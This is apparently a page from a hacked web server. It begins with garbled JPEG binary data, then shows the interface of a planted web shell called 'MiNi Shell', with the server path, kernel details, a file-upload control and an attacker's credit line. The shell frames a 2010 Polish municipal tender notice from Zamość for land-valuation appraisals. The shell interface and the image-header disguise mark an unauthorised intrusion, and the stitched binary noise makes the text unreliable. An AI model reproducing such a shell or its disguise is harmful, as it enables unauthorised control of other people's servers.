JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101006/275741-N-2010.html

<p class="kh_header"><b>Zamość: Opracowanie operatów szacunkowych wartości rynkowych nieruchomości gruntowych położonych na terenie Miasta Zamość</b><br>
<b>Numer ogłoszenia: 275741 - 2010; data zamieszczenia: 06.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zamość , Rynek Wielki 13, 22-400 Zamość, woj. lubelskie, tel. 084 6392084, faks 084 6393054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie operatów szacunkowych wartości rynkowych nieruchomości gruntowych położonych na terenie Miasta Zamość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest opracowanie operatów szacunkowych wartości rynkowych nieruchomości gruntowych położonych na terenie Miasta Zamość.
2.	Przedmiot zamówienia składa się z  3 niepodzielnych zadań:

ZADANIE NR I - Opracowanie operatu szacunkowego wartości rynkowej                  nieruchomości gruntowej stanowiącej własność Miasta Zamość do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności 
Wykonanie wyceny nieruchomości gruntowej stanowiącej własność Miasta Zamość, oznaczonej numerem 109, o pow. 560 m2 , w ark. mapy ew. nr 31, przy ul. Korczyńskiego.

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszty  wykonania całości zadania.

ZADANIE NR II - Opracowanie operatów szacunkowych wartości rynkowych            nieruchomości gruntowych stanowiących własność Skarbu Państwa do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności 
Wykonanie wyceny nieruchomości gruntowych stanowiących własność Skarbu Państwa, oznaczonych numerami:
- 270, o pow. 1008 m2 , w ark. mapy ew. nr 18, przy ul. Kazimierza Wielkiego i Mieszka I,
- 255/5, o pow. 849 m2 , w ark. mapy ew. nr 18, przy ul. Kazimierza Wielkiego.

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszty  wykonania całości zadania.

ZADANIE NR III  - Opracowanie dwóch operatów szacunkowych wartości rynkowych niezabudowanych nieruchomości gruntowych, przeznaczonych do sprzedaży w trybie bezprzetargowym, celem poprawienia warunków zagospodarowania nieruchomości sąsiedniej
Wykonanie dwóch operatów szacunkowych wartości rynkowych niezabudowanych nieruchomości gruntowych oznaczonych numerami:
- 363/2, o pow. 405m2, w ark. mapy ew. nr 101, przy ul. Pszenicznej, celem poprawienia warunków zagospodarowania nieruchomości przyległej składającej się z działek oznaczonych numerami 55/1 i 362, ark. 101. 
- 363/1, o pow. 122m2, w ark. mapy ew. nr 101, przy ul. Pszenicznej, celem poprawienia warunków zagospodarowania nieruchomości przyległej oznaczonej numerem 345, ark. 101. 
Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszty  wykonania całości zadania.

3.	Wykonawca zobowiązany jest wykonać w ramach zamówienia dokumentację fotograficzną szacowanych nieruchomości..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych, również wykonywaniem usług min. 10 operatów szacunkowych wartości rynkowej nieruchomości gruntowych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże dysponowanie osobami o odpowiednich uprawnieniach, tj. co najmniej 1 osobą, posiadającą uprawnienia zawodowe w zakresie szacowania nieruchomości (rzeczoznawcy majątkowego) w rozumieniu ustawy  z dnia 21 sierpnia 1997r o gospodarce nieruchomościami (Dz.U. z 2004r, Nr 261, poz. 2603 z późn. zm.), która będzie uczestniczyć w wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy (wg załącznika nr 1) - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich Wykonawców składających ofertę wspólną.
2.	Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania   w postępowaniu i zawarcia umowy, w przypadku Wykonawców wspólnie ubiegających  się  o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych. Treść pełnomocnictwa musi rozstrzygać, czy ustanowiony pełnomocnik jest uprawniony do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia publicznego, czy również do zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna także identyfikować wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, jak również wskazywać ustanowionego pełnomocnika - w formie oryginału lub kopii poświadczonej notarialnie.
3.	Pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy  dokumenty składające się na ofertę podpisuje osoba nie uprawniona do reprezentowania Wykonawcy (zgodnie z odpisem z Krajowego Rejestru Sądowego lub z zaświadczeniem o wpisie do ewidencji działalności gospodarczej)- w formie oryginału lub kopii poświadczonej notarialnie.
4.	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zamosc.um.gov.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (materiały przetargowe) można także uzyskać nieodpłatnie w siedzibie Zamawiającego: Urząd Miasta Zamość ul. Rynek Wielki 13, 22-400 Zamość, pokój nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2010 godzina 10:00, miejsce: Oferty należy składać w pokoju nr 7 (sekretariat Prezydenta) w Urzędzie Miasta Zamość, 22-400 Zamość, Rynek Wielki 13 (Ratusz).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Otwarcie ofert nastąpi w dniu 15.10.2010r o godz. 11:00 w siedzibie Zamawiającego    - w Urzędzie Miasta Zamość, Rynek Wielki 13, 22-400 Zamość w pokoju nr 12 (Ratusz). Osoby uprawnione do kontaktów z Wykonawcami :  Małgorzata Strzępek, Marta Trych fax (84) 639-30-54, e-mail: zamowienia@zamosc.um.gov.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR I - Opracowanie operatu szacunkowego wartości rynkowej                              nieruchomości gruntowej stanowiącej własność Miasta Zamość do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR I - Opracowanie operatu szacunkowego wartości rynkowej                              nieruchomości gruntowej stanowiącej własność Miasta Zamość do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności.
Wykonanie wyceny nieruchomości gruntowej stanowiącej własność Miasta Zamość, oznaczonej numerem 109, o pow. 560 m2 , w ark. mapy ew. nr 31, przy ul. Korczyńskiego.

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszty  wykonania całości zadania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR II - Opracowanie operatów szacunkowych wartości rynkowych                             nieruchomości gruntowych stanowiących własność Skarbu Państwa do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR II - Opracowanie operatów szacunkowych wartości rynkowych                             nieruchomości gruntowych stanowiących własność Skarbu Państwa do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności. 
Wykonanie wyceny nieruchomości gruntowych stanowiących własność Skarbu Państwa, oznaczonych numerami:
- 270, o pow. 1008 m2 , w ark. mapy ew. nr 18, przy ul. Kazimierza Wielkiego i Mieszka I,
- 255/5, o pow. 849 m2 , w ark. mapy ew. nr 18, przy ul. Kazimierza Wielkiego.

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszty  wykonania całości zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR III  - Opracowanie dwóch operatów szacunkowych wartości rynkowych niezabudowanych nieruchomości gruntowych, przeznaczonych do sprzedaży w trybie bezprzetargowym, celem poprawienia warunków zagospodarowania nieruchomości sąsiedniej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR III  - Opracowanie dwóch operatów szacunkowych wartości rynkowych niezabudowanych nieruchomości gruntowych, przeznaczonych do sprzedaży w trybie bezprzetargowym, celem poprawienia warunków zagospodarowania nieruchomości sąsiedniej.
Wykonanie dwóch operatów szacunkowych wartości rynkowych niezabudowanych nieruchomości gruntowych oznaczonych numerami:
- 363/2, o pow. 405m2, w ark. mapy ew. nr 101, przy ul. Pszenicznej, celem poprawienia warunków zagospodarowania nieruchomości przyległej składającej się z działek oznaczonych numerami 55/1 i 362, ark. 101. 
- 363/1, o pow. 122m2, w ark. mapy ew. nr 101, przy ul. Pszenicznej, celem poprawienia warunków zagospodarowania nieruchomości przyległej oznaczonej numerem 345, ark. 101. 
Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszty  wykonania całości zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com